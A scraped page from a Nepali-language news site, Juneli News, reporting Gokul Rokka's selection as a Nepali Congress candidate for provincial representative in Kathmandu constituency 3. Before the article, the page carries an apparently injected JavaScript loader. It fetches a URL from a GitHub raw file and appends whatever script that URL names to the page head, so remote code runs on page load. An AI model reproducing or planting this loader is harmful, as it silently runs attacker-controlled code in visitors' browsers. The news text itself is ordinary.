;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); काठमाडौँ क्षेत्र नं ३ प्रदेश ‘ख’, प्रदेश प्रतिनिधिका उम्मेदवारमा गोकुल रोक्का – जुनेली न्युज
बिहिबार, बैशाख ५, २०८२
  • होमपेज
  • काठमाडौँ क्षेत्र नं ३ प्रदेश ‘ख’, प्रदेश प्रतिनिधिका उम्मेदवारमा गोकुल रोक्का
Breaking News

काठमाडौँ क्षेत्र नं ३ प्रदेश ‘ख’, प्रदेश प्रतिनिधिका उम्मेदवारमा गोकुल रोक्का

जुनेली न्यूज, काठमाण्डौ | नेपालि काँग्रेस काठमाडौँ क्षेत्र नं ३  सुन्दरीजल, निवासी  गोकुल रोक्का प्रदेश ‘ख’ को प्रदेश प्रतिनिधिमा  उम्मेदवार चयन भएका छन् | आज नयाँपाटी पार्टी प्यालेसमा भएको उम्मेदवारी घोषणा कार्यक्रममा सम्पूर्ण कार्यसमिति प्रदेश प्रतिनिधिको नाम प्रस्ताब गरि क्षेत्रीय सभापति सन्तोष चालिसेले समर्थन गरेका हुन् | उनको सभापतिका उम्मेदवार श्रीकृष्ण थापा समुहाबाट नाम आएको हो |

नेपाल तरुण दलमा रही लामो समय देखि सक्रिय रुपमा कार्य गर्दै आएका उनि हाल  नेपाल तरुण दल काठमाडौँ जिल्ला संगठन बिभाग सदस्य समेत रहेका छन् |

 

फेसबुक प्रतिक्रियाहरु